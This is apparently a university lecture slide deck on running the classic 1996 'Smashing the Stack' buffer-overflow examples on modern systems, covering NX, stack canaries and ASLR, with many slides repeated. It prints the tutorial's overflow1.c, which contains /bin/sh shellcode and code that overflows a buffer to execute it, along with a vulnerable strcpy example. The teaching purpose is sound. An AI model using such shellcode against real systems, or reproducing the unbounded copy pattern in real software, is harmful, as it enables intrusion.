a passion of the soul: an introduction to pain for consciousness
TRANSCRIPT
![Page 1: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/1.jpg)
Overview Hurdles Conclusion
CS 6V81-05Smashing the Stack in 2011
Andrew Folloder
Department of Computer ScienceUniversity of Texas at Dallas
January 25th, 2012
![Page 2: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/2.jpg)
Overview Hurdles Conclusion
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 3: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/3.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 4: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/4.jpg)
Overview Hurdles Conclusion
Overview
Smashing The Stack For Fun And Profit (1996)
First tutorial on stack buffer overflowOutdated after 15 years of exploit research defense
How to run tutorial examples on modern computer?Talk about:
intentional hurdles on today’s computersa few unintentional
how to get around these issues
![Page 5: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/5.jpg)
Overview Hurdles Conclusion
Overview
Smashing The Stack For Fun And Profit (1996)
First tutorial on stack buffer overflowOutdated after 15 years of exploit research defense
How to run tutorial examples on modern computer?Talk about:
intentional hurdles on today’s computersa few unintentional
how to get around these issues
![Page 6: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/6.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 7: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/7.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 8: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/8.jpg)
Overview Hurdles Conclusion
Minor Changes
Dynamic BuffersDynamic Buffer no longer only refers to the stackMuch work has been done on heap-based dynamic buffers
stack locals –> automaticheap allocations –> dynamic
EBP Register
Frame pointer for referencing both local variables andparameters64bit OSes do not treat EBP as a special purpose registerEBP may be used as a general purpose register
![Page 9: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/9.jpg)
Overview Hurdles Conclusion
Minor Changes
Dynamic BuffersDynamic Buffer no longer only refers to the stackMuch work has been done on heap-based dynamic buffersstack locals –> automaticheap allocations –> dynamic
EBP Register
Frame pointer for referencing both local variables andparameters64bit OSes do not treat EBP as a special purpose registerEBP may be used as a general purpose register
![Page 10: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/10.jpg)
Overview Hurdles Conclusion
Minor Changes
Dynamic BuffersDynamic Buffer no longer only refers to the stackMuch work has been done on heap-based dynamic buffersstack locals –> automaticheap allocations –> dynamic
EBP Register
Frame pointer for referencing both local variables andparameters
64bit OSes do not treat EBP as a special purpose registerEBP may be used as a general purpose register
![Page 11: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/11.jpg)
Overview Hurdles Conclusion
Minor Changes
Dynamic BuffersDynamic Buffer no longer only refers to the stackMuch work has been done on heap-based dynamic buffersstack locals –> automaticheap allocations –> dynamic
EBP Register
Frame pointer for referencing both local variables andparameters64bit OSes do not treat EBP as a special purpose registerEBP may be used as a general purpose register
![Page 12: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/12.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 13: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/13.jpg)
Overview Hurdles Conclusion
NX (DEP)
NXIntel feature built into x86 architecture (Pentium4+)
Prevents code from executing from within .data segmentcauses a segmentation fault
Like memory page permission bits (read/write/execute)1996: R/WToday: R/W/X
![Page 14: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/14.jpg)
Overview Hurdles Conclusion
NX (DEP)
NXIntel feature built into x86 architecture (Pentium4+)Prevents code from executing from within .data segment
causes a segmentation faultLike memory page permission bits (read/write/execute)
1996: R/WToday: R/W/X
![Page 15: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/15.jpg)
Overview Hurdles Conclusion
NX (DEP)
NXIntel feature built into x86 architecture (Pentium4+)Prevents code from executing from within .data segment
causes a segmentation fault
Like memory page permission bits (read/write/execute)1996: R/WToday: R/W/X
![Page 16: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/16.jpg)
Overview Hurdles Conclusion
NX (DEP)
NXIntel feature built into x86 architecture (Pentium4+)Prevents code from executing from within .data segment
causes a segmentation faultLike memory page permission bits (read/write/execute)
1996: R/WToday: R/W/X
![Page 17: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/17.jpg)
Overview Hurdles Conclusion
NX (DEP)
NXIntel feature built into x86 architecture (Pentium4+)Prevents code from executing from within .data segment
causes a segmentation faultLike memory page permission bits (read/write/execute)
1996: R/W
Today: R/W/X
![Page 18: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/18.jpg)
Overview Hurdles Conclusion
NX (DEP)
NXIntel feature built into x86 architecture (Pentium4+)Prevents code from executing from within .data segment
causes a segmentation faultLike memory page permission bits (read/write/execute)
1996: R/WToday: R/W/X
![Page 19: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/19.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 20: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/20.jpg)
Overview Hurdles Conclusion
Stack Protection
ProPolice/StackGuard
gcc mechanism for stack buffer protection
canary : chosen/psudo-random value
place a canary within a stack frame between its data and control elements
very difficult/impossible to predict canary value
example2.c------------------------------------------------------void function(char *str) {char buffer[16];
strcpy(buffer,str);}
void main() {char large_string[256];int i;
for( i = 0; i < 255; i++)large_string[i] = ’A’;
function(large_string);}------------------------------------------------------
![Page 21: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/21.jpg)
Overview Hurdles Conclusion
Stack Protection
ProPolice/StackGuard
gcc mechanism for stack buffer protection
canary : chosen/psudo-random value
place a canary within a stack frame between its data and control elements
very difficult/impossible to predict canary value
example2.c------------------------------------------------------void function(char *str) {char buffer[16];
strcpy(buffer,str);}
void main() {char large_string[256];int i;
for( i = 0; i < 255; i++)large_string[i] = ’A’;
function(large_string);}------------------------------------------------------
![Page 22: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/22.jpg)
Overview Hurdles Conclusion
Stack Protection
ProPolice/StackGuard
gcc mechanism for stack buffer protection
canary : chosen/psudo-random value
place a canary within a stack frame between its data and control elements
very difficult/impossible to predict canary value
example2.c------------------------------------------------------void function(char *str) {char buffer[16];
strcpy(buffer,str);}
void main() {char large_string[256];int i;
for( i = 0; i < 255; i++)large_string[i] = ’A’;
function(large_string);}------------------------------------------------------
![Page 23: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/23.jpg)
Overview Hurdles Conclusion
Stack Protection
ProPolice/StackGuard
gcc mechanism for stack buffer protection
canary : chosen/psudo-random value
place a canary within a stack frame between its data and control elements
very difficult/impossible to predict canary value
example2.c------------------------------------------------------void function(char *str) {char buffer[16];
strcpy(buffer,str);}
void main() {char large_string[256];int i;
for( i = 0; i < 255; i++)large_string[i] = ’A’;
function(large_string);}------------------------------------------------------
![Page 24: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/24.jpg)
Overview Hurdles Conclusion
Stack Protection
ProPolice/StackGuard
gcc mechanism for stack buffer protection
canary : chosen/psudo-random value
place a canary within a stack frame between its data and control elements
very difficult/impossible to predict canary value
example2.c------------------------------------------------------void function(char *str) {char buffer[16];
strcpy(buffer,str);}
void main() {char large_string[256];int i;
for( i = 0; i < 255; i++)large_string[i] = ’A’;
function(large_string);}------------------------------------------------------
![Page 25: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/25.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 26: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/26.jpg)
Overview Hurdles Conclusion
ProPolice, NX, and overflow1.c
overflow1.c------------------------------------------------------------------------------char shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {char buffer[96];int i;long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)large_string[i] = shellcode[i];
strcpy(buffer,large_string);}------------------------------------------------------------------------------
Reason: gcc allocates far more stack space in recent versions than in the past
![Page 27: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/27.jpg)
Overview Hurdles Conclusion
ProPolice, NX, and overflow1.c
overflow1.c------------------------------------------------------------------------------char shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {char buffer[96];int i;long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)large_string[i] = shellcode[i];
strcpy(buffer,large_string);}------------------------------------------------------------------------------
Reason: gcc allocates far more stack space in recent versions than in the past
![Page 28: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/28.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 29: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/29.jpg)
Overview Hurdles Conclusion
ASLR
Address Space Layout RandomizationRebases stacks, code segments, DLLs, and more
sp.c--------------------------------unsigned long get_sp(void) {__asm__("movl %esp,%eax");}void main() {printf("0x%x\n", get_sp());}--------------------------------
![Page 30: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/30.jpg)
Overview Hurdles Conclusion
ASLR
Address Space Layout RandomizationRebases stacks, code segments, DLLs, and more
sp.c--------------------------------unsigned long get_sp(void) {__asm__("movl %esp,%eax");}void main() {printf("0x%x\n", get_sp());}--------------------------------
![Page 31: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/31.jpg)
Outline
1 Overview
2 HurdlesMinor ChangeseXecute Disable Bit (Data Execution Prevention)Stack ProtectionProPolice, NX, and overflow1.cAddress Space Layout Randomization
3 Conclusion
![Page 32: A Passion of the Soul: An Introduction to Pain for Consciousness](https://reader031.vdocument.in/reader031/viewer/2022021120/62060621cf456418c32f0d15/html5/thumbnails/32.jpg)
Overview Hurdles Conclusion
Conclusion
Alot of work has been done to prevent buffer overflowexploits making them much harder to performThis gives a quick overview on how the original “exploittutorial” can be performed on a modern computer runningUbuntu